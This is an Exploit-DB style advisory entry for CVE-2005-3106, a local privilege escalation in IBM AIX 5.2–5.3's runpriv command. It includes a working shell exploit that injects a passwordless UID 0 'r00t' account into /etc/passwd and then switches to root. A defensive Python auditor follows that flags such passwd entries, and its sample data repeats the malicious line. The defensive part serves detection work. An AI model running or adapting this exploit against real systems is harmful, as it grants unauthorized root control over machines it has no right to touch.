Vendor: AIX
By: milw0rm.com
CVSS: 7.2 HIGH
Privilege Escalation
CWE: 264
Product Name: AIX
Affected Version From: AIX 5.2
Affected Version To: AIX 5.3
Patch Exists: YES
Related CVE: CVE-2005-3106
CPE: o:ibm:aix:5.2
Platforms Tested: AIX
2005

Privilege Escalation in runpriv

The runpriv command of the IBM AIX operating system does not properly drop privileges when it executes a command. As a result, a local user can run a command as root and gain root privileges. The vulnerability is present in AIX 5.2 and 5.3.

Mitigation:

Upgrade to the latest version of AIX 5.2 and 5.3.

Exploit-DB raw data:

#!/bin/sh
# Advisory: http://www.idefense.com/intelligence/vulnerabilities/display.php?id=312

/usr/sysadm/bin/runpriv mountfs -s test -d / -o |
  "ksh -c 'echo r00t::0:0:r00t:/tmp:/bin/sh >> /etc/passwd'"
su r00t -c "chown root:sys /tmp/passwd123 ;
mv /tmp/passwd123 /etc/passwd ;
chmod 644 /etc/passwd ; su" 

# milw0rm.com [2005-10-10]
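
A defender-side check, added here as an example and not part of the original exploit entry: the script above appends an account with UID 0 and an empty password field to /etc/passwd, so the function below audits passwd-format text for those traits. The sample file contents, the function name audit_passwd and its allowed_uid0 parameter are constructed for this example.

```python
"""Audit passwd-format text for the kind of entry the script above appends."""

# Constructed sample: ordinary entries plus the line written by the script above.
SAMPLE_PASSWD = """\
root:!:0:0::/:/usr/bin/ksh
daemon:!:1:1::/etc:
bin:!:2:2::/bin:
guest:!:100:100::/home/guest:
r00t::0:0:r00t:/tmp:/bin/sh
"""


def audit_passwd(text, allowed_uid0=("root",)):
    """Return a list of (line_number, account, reason) findings."""
    findings = []
    seen = set()
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            # A truncated or padded line can hide an entry from naive tools.
            findings.append((lineno, fields[0], "malformed entry"))
            continue
        name, passwd, uid = fields[0], fields[1], fields[2]
        if name in seen:
            findings.append((lineno, name, "duplicate account name"))
        seen.add(name)
        if passwd == "":
            # An empty second field means the account needs no password.
            findings.append((lineno, name, "empty password field"))
        try:
            is_root = int(uid) == 0  # int() also catches forms such as "00"
        except ValueError:
            findings.append((lineno, name, "non-numeric UID"))
            continue
        if is_root and name not in allowed_uid0:
            findings.append((lineno, name, "UID 0 account not in allow-list"))
    return findings


if __name__ == "__main__":
    for lineno, name, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"line {lineno}: {name}: {reason}")
```

To audit a live or collected file, pass its contents to audit_passwd, for example `audit_passwd(open("/etc/passwd").read())`.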